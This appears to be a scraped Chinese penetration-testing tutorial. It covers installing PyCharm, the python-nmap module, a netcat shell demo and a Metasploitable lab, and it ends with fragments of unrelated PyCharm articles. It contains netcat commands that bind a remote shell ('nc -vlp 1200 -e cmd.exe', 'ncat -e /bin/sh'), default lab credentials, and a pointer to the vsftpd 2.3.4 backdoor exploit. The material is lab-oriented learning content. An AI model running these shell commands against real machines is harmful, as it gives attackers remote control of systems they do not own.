7.安装pycharm----导入Nmap模块----netcat反向shell----metasploitable靶机环境

安装pycharm

www.jetbrains.com/pycharm/
tar -zxvf p补全
ls
cd p补全
ls
cd bin
ls
./pycharm.sh

新建项目 pythonRocks.py
print "python Rocks"

cd Desktop
ls
chmod +x pythonRocks.py
ls
python pythonRocks.py

导入Nmap模块

cd Desktop
pip install python-nmap
  • 从网站的方式下载模块
pypi.python.org/pypi
索引 nmap
解压   打开终端
cd python-nmap-0.6.1/
ls
cd python-nmap-0.6.1/
ls
python setup.py install

打开pycharm 新建项目 nmap_Test

improt nmap
nmap1 =nmap.PortScanner()

a = nmap1.nmap_version()

print(a)
ls
python nmap_Test.py
nmap -v

netcat反向shell

ncat
nc --help
nc -help
windows:cd Desktop
nc -vlp 1200
linux:nc - vv windowsIP地址 1200
hello,this it a test message.
windows:hello,it is me.
linux:退出nc

windows:nc -help
nc -vlp 1200 -e cmd.exe
linux:nc - vv windowsIP地址 1200
nc -vlp 1200 -e /bin/sh
ncat -e /bin/sh 1200
sudo bash
apt-get install nmap
ncat -e /bin/sh -vlp 1200
windows:nc -vv linuxIP地址 1200

metasploitable

服务器端攻击,这些IP一般不会变,域名如facebook.com
ping www.facebook.com
下载靶机metasploitable到虚拟机

  • 在靶机中的所有实验和现实情况是一模一样的,请大家一定要遵守法律。
  • 不得打着没有实战的口号,进行正式站点的实战尝试。
    ** 你会发现带有网络web功能的靶机在浏览器里显示内容。
    ** 它是没有安全性功能的靶机,更方便用于原理学习,帮助你更好的验证红队技术。
    ** 正相反,实际站点的安全性非常丰富,防御组件繁多,更不利于学习和掌握核心技术。
    ** 因此,综合所有原因。靶机才是最实际的实战方式,可以测试你所有技术。
  • 例子为parrot发行版
确保靶机网络设置为NAT
不管是服务器渗透还是客户端渗透,先拿到目标IP地址
靶机:ifconfig
parrot:浏览器     输入靶机IP
我们的目标是收集信息,收集靶机中的关于服务器的信息
你可以使用zenmap和nmap在图形化工具与命令行工具中灵活切换
打开zenmap 输入靶机IP地址  选择强烈扫描    下面就会显示生成命令行
会看见打开了很多服务与端口

ssh [email protected]靶机IP
是否使用RSA密钥选择yes
默认密码 msfadmin
clear    ls    ifconfig    whoami    uname -r    logout

查看zenmap扫描结果信息
谷歌 vsftpd 2.3.4 exploits    得到这个模块是一个获取后门的模块
parrot:msfconsole


再次声明:过分的体现红队信息,真正受益者是用户和蓝队。

如果您不看见,就不会注意版本信息,也就不会重视升级与更新。

随着时间的推移,攻击您的不是初学者,而是更高级别的国际犯罪者。

原文地址:https://www.cnblogs.com/sec875/p/11296859.html

时间: 2024-11-07 14:18:55

7.安装pycharm----导入Nmap模块----netcat反向shell----metasploitable靶机环境的相关文章

5.pycharm中导入第三方模块的方法

最近刚入门学习python,网上查找了一些资料,发现python编程用的软件pycharm还是比较多的,于是就跟随大众,学习使用pycharm,在学习的过程中,想要导入第三方模块pyperclip,但不知道怎么导入,于是在网友的帮助下,撑握了pycharm导入第三方模块的方法,现将导入第三方模块的方法分享如下: 1.在pycharm中选择设置. 2.进入设置选择Project Interpreter,然后在左边选择下拉列表中选择已经安装的python版本. 3.选择完成后,在右侧点击‘+’的符号

使用 netcat 实现反向 shell 访问以便于远程调试设备

问题 在实际开发项目中,原型产品在推向市场.实际部署使用之前,也需要在实际环境进行试验性运行,以便测试和改进. 但可能出现的一个问题是,部署测试的实际环境与办公室有一定的距离,甚至在不同的城市里.当应用服务程序异常后者挂掉的时候,就没有办法探查设备的实际情况了. 要是在办公室里,就可以基于局域网 ssh 登录访问,甚至基于调试串口登录.由于设备在远程,是无法通过 ssh 直接登录了. 基本概念 我们上面说的"登录",其实都是是指通过 Linux 的 shell 登录系统.那下面准备介绍

Python:Pycharm下无法导入安装好的第三方模块?

Pycharm下无法导入安装好的第三方模块requests? 在cmd下使用pip安装好requests模块后,可以使用import requests,但在Pycharm IDE下无法导入,出现如下错误: >>> import requests Traceback (most recent call last): File "<input>", line 1, in <module> File "C:\Program Files (x

pycharm导入自己写的包的时候,不发识别模块的解决办法

今天用写selenium脚本的时候导入自己统计目录下的模块时,出错,明明存在但是报错说模块不存在,找了半天终于找到解决方案,顺便记录一下吧 pycharm不会将当前文件目录自动加入自己的sourse_path.右键make_directory as-->sources root将当前工作的文件夹加入source_path就可以了. 有时候可能会遇到在pycharm导入我们pip安装过的包,但是还有会报错没找到该模块,这个时候可以在设置里面添加File->setting,打开设置界面如下图 在我

Pygame模块在Pycharm导入失败解决

当安装完pygame包,且已经在windows命令行界面看到import pygame成功,如下 但是在pycharm上导入import却失败,如下 这是因为Pygame默认安装到C盘,但一般我们pycharm的python文件放到非C盘,所以要为pycharm加入pygame包找到pygame的安装路径,拷贝其pygame.pygame-1.9.6.dist-info两个文件夹至python项目文件D:\PythonProject\venv\Lib\site-packages目录下即可源文件

python3在pycharm中为什么导入random模块不能用? TypeError: &#39;module&#39; object is not callable

新手学python求大神指导,也用sys导入了random.py的路径,仍然不行. 刚刚排错貌似找到了问题的原因...那是因为我在pycharm中新建的python文件名就是random,所以当前目录下就有一个random.py文件而且是自己写的,所以它在sys.path中会先找到自己定义的random.py并调用之,因为自己的什么都没有,所以就呵呵了:改了文件名字后就ok了 要多注意文件名这种情况,有时候文件名与系统的模块重名了,就出这种莫名其妙的错,也不方便查错 python3在pychar

pycharm 导入模块的时候额外加入模块的方法

我们在导入logging模块的时候我们往往需要定义baseicConfig,但是我们往往需要重复定义,所以在这里我们可以在pycharm中一次定义多次使用. import logging FROMAT = logging.basicConfig(level=logging.INFO, format='%(asctime)s %(name)s [%(message)s]') 原文地址:https://blog.51cto.com/853056088/2413657

Python 模块化 模块搜索顺序、重复导入、模块加载列表(五)

模块搜索顺序.重复导入.模块加载列表 0x00 模块搜索顺序: 举例: #test.py import sys for p in sys.path: print(p) 运行结果: C:\python //pycharm环境中的Add content roots to PYTHONPATH C:\python //脚本所在目录 C:\Users\ihoney\AppData\Local\Programs\Python\Python35\python35.zip //打包,java扎包,避免大量小文

PyCharm导入tensorflow包报错的问题

[注]PyCharm导入tensorflow包报错的问题 若是你也遇到这个问题,说明你也没有理解tensorflow到底在哪里. 当安装了anaconda3.6后,在PyCharm中设置interpreter,这个解释器决定了你在PyCharm环境中写的代码采用什么方式去执行. 若是你的设置是anaconda下的python.exe.就会发现在PyCharm中写入import tensorflow as tf 时,就会报错,提示没有tensorflow模块,这是因为anaconda文件下的pyt